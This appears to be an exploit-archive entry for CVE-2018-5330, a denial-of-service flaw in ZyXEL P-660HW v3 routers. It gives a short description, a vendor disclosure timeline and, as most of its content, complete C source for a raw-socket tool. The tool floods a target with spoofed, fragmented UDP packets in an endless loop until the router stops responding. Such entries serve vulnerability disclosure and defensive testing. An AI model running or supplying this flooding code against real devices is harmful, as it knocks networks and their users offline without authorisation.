| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| ZyXEL P-660HW UDP Denial Of Service Exploit | 13 Jan 201800:00 | – | zdt | |
| ZyXEL P-660HW Denial of Service Vulnerability (CNVD-2018-04321) | 18 Jan 201800:00 | – | cnvd | |
| CVE-2018-5330 | 16 Jan 201819:00 | – | cve | |
| CVE-2018-5330 | 16 Jan 201819:00 | – | cvelist | |
| EUVD-2018-17109 | 7 Oct 202500:30 | – | euvd | |
| CVE-2018-5330 | 16 Jan 201819:29 | – | nvd | |
| Code injection | 16 Jan 201819:29 | – | prion |
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#Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service
CVE: CVE-2018-5330
#CWE: CWE-400
#Exploit Author: Hosein Askari
#Vendor HomePage: https://www.zyxel.com/
#Version : v3
#Tested on: ZyXEL P-660HW
#Category: Network Appliance
#Author Mail : [email protected]
#description: ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (router unreachable/unresponsive) via a flood of fragmented UDP packets.
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Vendor status:
[02.01.2018] Vulnerability discovered
[04.01.2018] CVE requestion
[10.01.2018] CVE assigned
[10.01.2018] Contact with the vendor
[11.01.2018] Vendor responds asking for details
[11.01.2018] Sent detailed information to the vendor(exploit, sample of PCAP, video of attack)
[11.01.2018] Vendor assigns appropriate team for coordination
[11.01.2018] Vendor is analyzing the issue
[12.01.2018] Asked vendor for confirmation
[12.01.2018] Vendor replies with confirmation of the issue
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#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/udp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define change(n) (n)
#else
#define change(n) htons(n)
#endif
#define ip_1 8193
#define head 153
#define u_head 41
#define level 0
// Exploit Author : Hosein Askar
u_long p_rec(u_char *);
void running(u_char *);
void fragmentation(int, u_long, u_long, u_short, u_short, u_short);
int main(int argc, char **argv)
{
int j = 1, i, socks, counter=1, number=1;
u_long s_ip = 0;
u_long d_ip = 0;
u_short s_port = 0;
u_short d_port = 0;
if((socks = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("Error");
exit(1);
}
if (setsockopt(socks, IPPROTO_IP, IP_HDRINCL, (char *)&j, sizeof(j)) < 0)
{
perror("Error");
exit(1);
}
if (argc < 2) running(argv[0]);
if (!(d_ip = p_rec(argv[1])))
{
exit(1);
}
fprintf(stderr, "Attack is started \n");
for (;;) {
counter ++;
s_ip = counter*10;
s_port = counter*10;
d_port = counter+1*10;
if (counter>10)
counter = 1;
for (i = 0; i < 10; i++)
{
fragmentation(socks, s_ip, d_ip, s_port, d_port, number++);
}
}
return (0);
}
void fragmentation(int sock, u_long s_ip, u_long d_ip, u_short s_port,u_short d_port, u_short number)
{
u_char *p = NULL, *pointer = NULL;
u_char byte;
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = s_port;
sin.sin_addr.s_addr = d_ip;
p = (u_char *)malloc(head + u_head + level);
pointer = p;
byte = 69;
memcpy(pointer, &byte, sizeof(u_char));
pointer += 2;
*((u_short *)pointer) = change(head + u_head + level);
pointer += 2;
*((u_short *)pointer) = htons(number);
pointer += 2;
*((u_short *)pointer) |= change(ip_1);
pointer += 2;
*((u_short *)pointer) = 247;
byte = IPPROTO_UDP;
memcpy(pointer + 1, &byte, sizeof(u_char));
pointer += 4;
*((u_long *)pointer) = s_ip;
pointer += 4;
*((u_long *)pointer) = d_ip;
pointer += 4;
*((u_short *)pointer) = htons(s_port);
pointer += 2;
*((u_short *)pointer) = htons(d_port);
pointer += 2;
*((u_short *)pointer) = htons(8);
if (sendto(sock, p, head + u_head + level, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(p);
exit(1);
}
free(p);
}
u_long p_rec(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void running(u_char *name)
{
fprintf(stderr,
"%s d_ip\n",
name);
exit(0);
}
##########################
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